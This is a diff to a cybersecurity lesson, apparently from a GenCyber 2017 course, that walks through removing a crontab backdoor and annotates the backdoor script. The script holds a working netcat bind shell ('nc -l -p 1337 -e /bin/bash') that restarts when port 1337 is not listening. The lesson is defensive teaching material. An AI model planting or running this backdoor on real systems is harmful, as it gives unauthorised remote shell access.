slackboxster/slackboxster.github.io/gencyber2017/lesson.md

             * remove that line from the crontab.
             * make sure it's been removed: `crontab -u rose -l`
         * for fun: explanation of the backdoor:

-            ```
+            ```bash
-            It is a script:
+            ## It is a script:
             #!/bin/bash

-            This is the command it uses to check that the script is running:
+            ## This is the command it uses to check that the script is running:
             isOn=`netstat -tln | grep ':1337'|wc -l`

-            The if statement checks the result of the isOn command -- if it is zero, then
+            ## The if statement checks the result of the isOn command -- if it is zero, then
             if [ $isOn == "0" ]
             then
-              It starts a netcat command that enables data sent to the 1337 port to give access to bash (the command line)
+              ## It starts a netcat command that enables data sent to the 1337 port to give access to bash (the command line)
               nc -l -p 1337 -e /bin/bash
             fi
             ```